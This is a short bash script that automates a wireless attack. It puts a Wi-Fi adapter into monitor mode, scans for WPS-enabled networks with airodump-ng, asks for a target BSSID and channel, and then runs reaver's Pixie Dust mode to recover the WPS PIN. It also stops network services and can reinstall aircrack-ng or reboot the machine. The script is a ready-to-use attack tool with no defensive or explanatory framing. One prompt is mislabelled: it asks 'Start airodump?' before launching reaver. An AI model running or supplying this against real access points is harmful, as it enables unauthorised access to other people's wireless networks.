#!/bin/bash
echo "Checking privileges..."
if [ "$(whoami)" != 'root' ]
then
	echo "You need R00T!"
	sudo mmode
	exit 1
fi
echo "Checking airodum-ng WPS..."
if airodump-ng | grep -q "Display WPS information"
then
	echo "Checking adapter state..."
	if iwconfig | grep -q "wlan0mon"
	then
		echo "Disabling monitor mode..."
		airmon-ng stop wlan0mon
		service NetworkManager start
		service avahi-daemon start
	else
		echo "Enabling monitor mode..."
		service NetworkManager stop
		service avahi-daemon stop
		killall wpa_supplicant
		airmon-ng start wlan0
		if [ "$1" != "silent" ]
		then
			read -p "Start airodump? [Y/n]:" STR
			if [ "$STR" == "Y" -o "$STR" == "y" ]
			then
				echo "Starting airodump..."
				airodump-ng wlan0mon --wps
			else
				echo "Assuming N0PE. Exiting..."
				exit 0
			fi
			read -p "Start airodump? [Y/n]:" STR
			if [ "$STR" == "Y" -o "$STR" == "y" ]
			then
				read -p "Enter target's BSSID:" BSSID
				read -p "Enter target's channel:" CH
				echo "Starting reaver..."
				reaver -i wlan0mon -c $CH -b $BSSID -K 1
			else
				echo "Assuming N0PE. Exiting..."
				exit 0
			fi
		fi		
	fi
else
	echo "You have old version aircrack-ng or not have this program"
	read -p "Install aircrack-ng? [Y/n]:" DWN
	if [ "$DWN" == "Y" -o "$DWN" == "y" ]
	then
		apt-get autoremove aircrack-ng
		apt-get install aircrack-ng
		read -p "Reboot your pc? [Y/n]:" REB
		if [ "$REB" == "Y" -o "$REB" == "y" ]
		then
			reboot
		else
			exit 0
		fi
	else
		exit 0
	fi
fi
